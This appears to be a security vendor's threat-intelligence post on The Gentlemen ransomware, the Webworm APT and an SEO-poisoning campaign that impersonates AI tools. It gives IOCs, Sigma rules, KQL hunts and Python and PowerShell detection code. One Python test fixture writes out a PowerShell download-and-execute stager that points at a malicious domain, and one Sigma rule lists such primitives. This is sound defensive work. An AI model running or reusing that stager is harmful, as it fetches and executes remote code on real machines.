
The Gentlemen RaaS, Webworm APT, and AI SEO Poisoning: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
May 22, 2026

Threat Summary

Current OTX pulse data shows three active campaigns against different sectors that share operational security themes. The Gentlemen RaaS operation is exploiting CVE-2024-55591 for initial access and clearing the Security, System and Application event logs before deploying ransomware. In parallel, the China-aligned Webworm APT group has evolved its "burrowing" tradecraft, routing C2 over legitimate platforms (Discord, Microsoft Graph API) so that it blends with normal traffic in European government networks. Finally, a financially motivated eCrime campaign is exploiting the interest in generative AI tools (Gemini, Claude) through SEO poisoning and typosquatting to deliver fileless infostealers to software developers in the US and UK.

Threat Actor / Malware Profile

The Gentlemen (RaaS)

  • Malware Families: The Gentlemen, Qilin. The third name in the pulse, Trojan:Win32/MpTamperBulkExcl.H, is a Microsoft Defender detection for bulk tampering with Defender exclusions rather than a malware family; it shows the operators weakening AV coverage before the payload is dropped.
  • Distribution: Exploitation of CVE-2024-55591, followed by PowerShell execution.
  • Behavior: Aggressive defense evasion, including clearing Security, System, and Application Event Logs. Uses Scheduled Tasks for persistence.
  • C2: SOCKS proxy usage to tunnel traffic.
  • Target: Transportation and Construction industries.

Webworm (APT)

  • Malware Families: EchoCreep, GraphWorm, WormFrp, ChainWorm.
  • Distribution: GitHub staging and custom proxy tools.
  • Behavior: "Burrowing" techniques to maintain long-term access. Decrypted C2 traffic reveals extensive operational planning.
  • C2: Abuse of legitimate web services; EchoCreep uses Discord Webhooks, GraphWorm uses Microsoft Graph API.
  • Target: Government and Education sectors in Europe and Africa.

AI Impersonation Campaign (eCrime)

  • Technique: SEO poisoning and typosquatting of AI developer tools (Gemini, Claude) and the Chocolatey package manager.
  • Behavior: Delivery of infostealers via fake installations; fileless PowerShell execution chains.
  • Target: Technology sector and software developers.

IOC Analysis

The provided IOCs span infrastructure, file artifacts, and vulnerabilities:

  • Network Infrastructure: IPv4s (e.g., 193.233.202.17) and typosquatted domains (e.g., gemini-setup.com, claude-setup.com). SOC teams should block these at the firewall and proxy level immediately. Discord C2 is a different case: EchoCreep talks to the legitimate Discord API over HTTPS, so blocking discord.com outright may break business use. Detect it instead with TLS inspection rules keyed on the /api/webhooks/ path, or at the endpoint by flagging non-browser, non-Discord-client processes that connect to Discord.
  • File Artifacts: SHA256 and SHA1 hashes are provided for ransomware payloads and backdoors. EDR solutions should be configured to quarantine files matching these hashes immediately; hashes are brittle, so pair them with the behavioural detections below.
  • Vulnerabilities: CVE-2024-55591 is The Gentlemen's initial-access vector. Vulnerability management teams must prioritise patching this specific CVE and should treat any unpatched, internet-facing instance as potentially already compromised.
  • Operationalization: IOCs should be loaded into SIEM correlation engines. Note that chocolatey.net is not the package manager's real domain (that is chocolatey.org) and, given the spoofing theme of this campaign, should be treated as malicious; the same applies to events.msft23.com.
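As an added example (not code from the pulse or from Security Arsenal), this is the matching logic a SOC would run over proxy logs against the indicators listed above. The exact-match lists hold the IPs and domains quoted on this page (the second IP is the one used in the KQL hunt further down); the brand-token allowlist (google.com, anthropic.com, claude.ai, chocolatey.org) and the log line format are assumptions made for the example, and the log lines are constructed, not real telemetry. The lookalike check goes beyond the page's IOC list: it flags any host carrying a squatted brand token outside the vendor's own domains, so the next typosquat lands in the same queue without a list update.

```python
"""Match proxy log lines against the pulse IOCs, plus a brand-lookalike heuristic (example code)."""
import ipaddress
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Indicators quoted on this page.
BAD_IPS = {"193.233.202.17", "77.110.122.137"}
BAD_DOMAINS = {"gemini-setup.com", "claude-setup.com", "chocolatey.net", "events.msft23.com"}

# Brand tokens the SEO-poisoning campaign squats on, and the domains where those tokens
# legitimately appear. The allowlist is an assumption made for this example.
BRAND_TOKENS = ("gemini", "claude", "chocolatey")
LEGIT_DOMAINS = ("google.com", "anthropic.com", "claude.ai", "chocolatey.org")


def extract_host(target: str) -> str:
    """Lowercase hostname (no trailing dot) from a URL, a host:port pair, or a bare host."""
    t = target.strip()
    if "://" not in t:
        t = "//" + t  # lets urlsplit treat host:port/path forms as a network location
    return (urlsplit(t).hostname or "").rstrip(".")


def under_domain(host: str, domain: str) -> bool:
    """True when host is the domain itself or one of its subdomains."""
    return host == domain or host.endswith("." + domain)


def match_ioc(target: str) -> Optional[str]:
    """Classify a destination as blocklist_ip, blocklist_domain, lookalike_domain, or None."""
    host = extract_host(target)
    if not host:
        return None
    try:
        ipaddress.ip_address(host)
        return "blocklist_ip" if host in BAD_IPS else None
    except ValueError:
        pass  # not an IP literal, fall through to domain checks
    if any(under_domain(host, d) for d in BAD_DOMAINS):
        return "blocklist_domain"
    # Heuristic: a brand token outside the vendor's own domains is a typosquat candidate.
    if any(tok in host for tok in BRAND_TOKENS) and not any(under_domain(host, d) for d in LEGIT_DOMAINS):
        return "lookalike_domain"
    return None


def scan_proxy_log(lines: List[str]) -> List[Dict[str, str]]:
    """Each line: '<timestamp> <client_ip> <method> <url-or-host:port>' (constructed format)."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        verdict = match_ioc(parts[3])
        if verdict:
            hits.append({"ts": parts[0], "client": parts[1], "url": parts[3], "verdict": verdict})
    return hits


# Constructed sample log lines; not real telemetry.
SAMPLE_LOG = [
    "2026-05-20T10:01:02Z 10.0.0.5 GET https://gemini-setup.com/Gemini_Setup.exe",
    "2026-05-20T10:01:09Z 10.0.0.5 GET https://cdn.claude-setup.com/installer.msi",
    "2026-05-20T10:02:15Z 10.0.0.7 GET https://gemini.google.com/app",
    "2026-05-20T10:03:40Z 10.0.0.9 GET https://claude-desktop-download.net/setup.exe",
    "2026-05-20T10:04:01Z 10.0.0.9 CONNECT 193.233.202.17:443",
    "2026-05-20T10:05:12Z 10.0.0.3 GET https://community.chocolatey.org/packages",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['client']} {hit['verdict']:17} {hit['url']}")
```

Subdomain matching matters here: an exact string compare on `gemini-setup.com` misses `cdn.claude-setup.com`-style staging hosts, and a plain substring match on `discord` or `gemini` would flag the vendor's own domains, which is why the allowlist is checked before a lookalike verdict is returned.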

Detection Engineering

YAML
---
title: Potential The Gentlemen Ransomware Activity - Security Event Log Cleared
id: 4c8f3d2a-1e9b-4a5f-9c2d-3e6f7a8b9c0d
description: Detects clearing of the Security event log (Event ID 1102, written as the first entry of the freshly cleared log), a TTP observed in The Gentlemen ransomware incidents. Event ID 517 is the pre-Vista equivalent and does not fire on supported Windows versions.
status: experimental
date: 2026/05/22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/664f3a9f2b3f9c0d1e2a3b4c
tags:
    - attack.defense_evasion
    - attack.t1070.001
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 1102
    condition: selection
falsepositives:
    - Legitimate administrative activity (rare; correlate SubjectUserName with the preceding logons)
level: high
---
title: Potential The Gentlemen Ransomware Activity - System or Application Event Log Cleared
id: 7f2a3b4c-5d6e-4f70-8a9b-1c2d3e4f5a6b
description: Detects clearing of the System or Application event log. Both are recorded in the System log as Event ID 104 from the Microsoft-Windows-Eventlog provider; the Security log records its own clearing separately as Event ID 1102.
status: experimental
date: 2026/05/22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/664f3a9f2b3f9c0d1e2a3b4c
tags:
    - attack.defense_evasion
    - attack.t1070.001
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: Microsoft-Windows-Eventlog
        EventID: 104
    condition: selection
falsepositives:
    - Legitimate administrative activity (rare)
level: high
---
title: Webworm APT - Suspicious Discord Process Connection
id: 5d9e4e3b-2f0a-4b6c-9d3e-4f7a8b9c0d1e
description: Detects non-browser processes establishing outbound connections to Discord API/CDN endpoints, indicative of EchoCreep webhook C2 observed in Webworm campaigns.
status: experimental
date: 2026/05/22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/664f3d9f2b3f9c0d1e2a3b4d
tags:
    - attack.command_and_control
    - attack.t1102.002
logsource:
    product: windows
    category: network_connection
detection:
    selection:
        Initiated: 'true'
        DestinationHostname|endswith:
            - 'discord.com'
            - 'discordapp.com'
    filter_main_browsers:
        Image|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
    filter_main_discord_client:
        Image|contains: '\AppData\Local\Discord\'
        Image|endswith: '\Discord.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate Discord client installed outside the default per-user path
    - Other browsers or chat integrations that post to Discord webhooks
level: medium
---
title: AI Impersonation Infostealer - Suspicious PowerShell CLI
id: 6e0f5f4c-3a1b-4c7d-9e4f-5a8b9c0d1e2f
description: Detects PowerShell launched with a hidden window together with an in-memory decode, download or execute primitive, the fileless pattern used by infostealers delivered via SEO poisoning campaigns targeting developers.
status: experimental
date: 2026/05/22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/664f4e9f2b3f9c0d1e2a3b4e
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    selection_hidden:
        CommandLine|contains:
            - '-windowstyle hidden'
            - '-w hidden'
            - '-w h '
    selection_payload:
        CommandLine|contains:
            - 'FromBase64String'
            - 'IEX'
            - 'Invoke-Expression'
            - 'DownloadString'
            - 'Net.WebClient'
            - '-EncodedCommand'
            - ' -enc '
    condition: selection_hidden and selection_payload
falsepositives:
    - System administration scripts that deliberately run hidden (allowlist by parent process or script path)
level: high


kql
// Hunt for The Gentlemen RaaS and Webworm indicators (Defender for Endpoint advanced hunting)
// Look for network connections to known malicious IPs and domains
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP in ("193.233.202.17", "77.110.122.137")
    or RemoteUrl has_any ("gemini-setup.com", "claude-setup.com", "chocolatey.net", "events.msft23.com")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteIP, RemoteUrl, RemotePort

// Hunt for Security log clearing (The Gentlemen TTP) in Microsoft Sentinel.
// Event ID 1102 is the current "audit log was cleared" event; 517 is the pre-Vista ID and will not match.
SecurityEvent
| where TimeGenerated > ago(7d)
| where EventID == 1102
| project TimeGenerated, Computer, Account, SubjectUserName

// System and Application log clears are written to the System log as Event ID 104 from Microsoft-Windows-Eventlog
Event
| where TimeGenerated > ago(7d)
| where EventLog == "System" and Source == "Microsoft-Windows-Eventlog" and EventID == 104
| project TimeGenerated, Computer, RenderedDescription

// Hunt for non-browser processes connecting to Discord (Webworm EchoCreep webhook C2).
// !in~ is case-insensitive, so Discord.exe and chrome.exe match regardless of how the name is cased.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("discord.com", "discordapp.com")
| where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe", "discord.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessCommandLine, RemoteUrl
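The same three detections written as plain Python over constructed Windows events, so the logic can be unit-tested before it is pushed to the SIEM. This is an added example, not code from the original page. Event IDs follow what supported Windows versions actually log: 1102 for the Security log, and 104 from the Microsoft-Windows-Eventlog provider for System and Application. The PowerShell check also decodes -EncodedCommand payloads (UTF-16LE base64) and inspects the decoded script, which a string match on the raw command line cannot do. Field names mirror Sysmon/Sigma conventions; the process paths, hostnames and the encoded stager are constructed for the example.

```python
"""Run the page's three detections over constructed Windows events (example, not real telemetry)."""
import base64
import re
from typing import Callable, Dict, List, Tuple

BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe"}
DISCORD_CLIENT = {"discord.exe"}
DISCORD_HOSTS = ("discord.com", "discordapp.com")
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# -EncodedCommand and the abbreviations PowerShell accepts, followed by the base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w\w*\s+h(?:idden)?\b")  # -windowstyle hidden, -w hidden, -w h
PAYLOAD_RE = re.compile(r"frombase64string|\biex\b|invoke-expression|downloadstring|net\.webclient")


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline: str) -> str:
    """Return the script behind -EncodedCommand (UTF-16LE base64), or '' if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def is_log_cleared(ev: Dict) -> bool:
    """Rule 1: Security log cleared (1102) or System/Application log cleared (104 in the System log)."""
    if ev.get("Channel") == "Security" and ev.get("EventID") == 1102:
        return True
    return (ev.get("Channel") == "System" and ev.get("EventID") == 104
            and ev.get("Provider") == "Microsoft-Windows-Eventlog")


def is_nonbrowser_discord(ev: Dict) -> bool:
    """Rule 2: connection to Discord from anything but a browser or the Discord client."""
    host = ev.get("DestinationHostname", "").lower()
    if not any(host == d or host.endswith("." + d) for d in DISCORD_HOSTS):
        return False
    return basename(ev.get("Image", "")) not in BROWSERS | DISCORD_CLIENT


def is_suspicious_powershell(ev: Dict) -> bool:
    """Rule 3: hidden PowerShell window plus a decode/download/execute primitive, also inside -enc payloads."""
    if basename(ev.get("Image", "")) not in POWERSHELL:
        return False
    cmd = ev.get("CommandLine", "")
    text = (cmd + " " + decode_encoded_command(cmd)).lower()
    return HIDDEN_RE.search(text) is not None and PAYLOAD_RE.search(text) is not None


RULES: Dict[str, Callable[[Dict], bool]] = {
    "gentlemen_eventlog_cleared": is_log_cleared,
    "webworm_nonbrowser_discord": is_nonbrowser_discord,
    "ai_seo_suspicious_powershell": is_suspicious_powershell,
}


def run_rules(events: List[Dict]) -> List[Tuple[str, int]]:
    """(rule_name, event_index) for every event that trips a rule."""
    return [(name, i) for i, ev in enumerate(events) for name, fn in RULES.items() if fn(ev)]


# Constructed sample events in Sysmon/Sigma field names; none of this is real telemetry.
PS_EXE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://claude-setup.com/s.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 1102, "Provider": "Microsoft-Windows-Eventlog", "SubjectUserName": "svc_backup"},
    {"Channel": "System", "EventID": 104, "Provider": "Microsoft-Windows-Eventlog", "SubjectUserName": "svc_backup"},
    {"Channel": "Security", "EventID": 4624, "Provider": "Microsoft-Windows-Security-Auditing"},
    {"Image": "C:\\Users\\dev\\AppData\\Local\\Discord\\app-1.0.9\\Discord.exe", "DestinationHostname": "discord.com"},
    {"Image": "C:\\Users\\Public\\svchost.exe", "DestinationHostname": "discord.com"},
    {"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "DestinationHostname": "cdn.discordapp.com"},
    {"Image": PS_EXE, "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"Image": PS_EXE, "CommandLine": "powershell.exe -WindowStyle Hidden -File C:\\ProgramData\\Backup\\rotate.ps1"},
    {"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "CommandLine": 'pwsh.exe -c "Get-Process"'},
]

if __name__ == "__main__":
    for name, idx in run_rules(SAMPLE_EVENTS):
        print(f"{name:30} event[{idx}] {SAMPLE_EVENTS[idx]}")
```

Note what the decode step buys: event 6 carries no `IEX`, `DownloadString` or `Net.WebClient` in its visible command line, only `-w hidden -enc <base64>`, so a rule keyed on those strings alone would miss it; decoding the blob exposes the stager and the rule fires. The hidden-but-benign backup task in event 7 does not fire because no payload primitive is present.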


powershell
# IOC Hunt Script for The Gentlemen and SEO Poisoning Campaigns
# Checks for files matching the known malicious SHA256 hashes, suspicious scheduled tasks,
# and recent event log clearing. Run elevated: reading the Security log needs administrator rights.

$MaliciousHashes = @(
    "f918535f974591ef031bd0f30a8171e3da27a6754e6426a8ba095f83195661c8",
    "9c87e8162b39fbb773c416006b16f8e34aca53372d1b2d4a584df0ffc69ad333",
    "89d634c8471382ff9c6fd966008ad5c376d7a0edae8f799eb569837170f2373d"
)

Write-Host "[+] Hunting for malicious file hashes..." -ForegroundColor Cyan

# Hash every file on C: (adjust scope as necessary; a full-drive pass is slow).
# -File skips directories, which Get-FileHash cannot hash; -contains compares case-insensitively,
# so the lower-case list matches the upper-case hex that Get-FileHash returns.
Get-ChildItem -Path C:\ -File -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($hash -and $MaliciousHashes -contains $hash) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }

Write-Host "[+] Checking for Suspicious Scheduled Tasks (The Gentlemen TTP)..." -ForegroundColor Cyan

# Look for tasks running PowerShell with a hidden window or an encoded command.
Get-ScheduledTask | Where-Object { $_.Actions.Execute -match 'powershell|pwsh' } | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        if ($action.Arguments -match '-w(indowstyle)?\s+h(idden)?|-e(c|nc|ncodedcommand)?\s') {
            Write-Host "[!] SUSPICIOUS TASK FOUND: $($task.TaskPath)$($task.TaskName) (runs as $($task.Principal.UserId))" -ForegroundColor Yellow
            Write-Host "    Action: $($action.Execute) $($action.Arguments)"
        }
    }
}

Write-Host "[+] Checking for event log clearing in the last 7 days (The Gentlemen TTP)..." -ForegroundColor Cyan

# 1102 = Security log cleared; 104 from Microsoft-Windows-Eventlog = System or Application log cleared.
$Since = (Get-Date).AddDays(-7)
$Filters = @(
    @{ LogName = 'Security'; Id = 1102; StartTime = $Since },
    @{ LogName = 'System'; ProviderName = 'Microsoft-Windows-Eventlog'; Id = 104; StartTime = $Since }
)
foreach ($filter in $Filters) {
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        Write-Host "[!] LOG CLEARED: $($_.LogName) EventID $($_.Id) at $($_.TimeCreated) on $($_.MachineName)" -ForegroundColor Red
    }
}

Write-Host "[+] Hunt complete." -ForegroundColor Green

Response Priorities

  • Immediate: Block all IOCs (IPs, domains) at the perimeter. Initiate hunts for event log clearing across the enterprise (Event ID 1102 in the Security log; Event ID 104 from Microsoft-Windows-Eventlog in the System log; 517 is the pre-Vista ID and will not match on supported Windows). Quarantine endpoints matching the provided file hashes. Start emergency patching of CVE-2024-55591 on internet-facing devices.
  • 24h: If developer workstations were targeted by the SEO poisoning campaign, force a credential reset for developer accounts (GitHub, Azure AD, etc.) and revoke existing tokens and sessions, since an infostealer harvests saved credentials and session cookies that survive a password change.
  • 1 week: Review web filtering policies to block newly registered and lookalike domains that imitate the AI and package-manager brands in this campaign. Enforce application controls to prevent unauthorized usage of PowerShell and scheduled tasks by non-administrators. Confirm CVE-2024-55591 is patched everywhere, not only on the devices identified first.
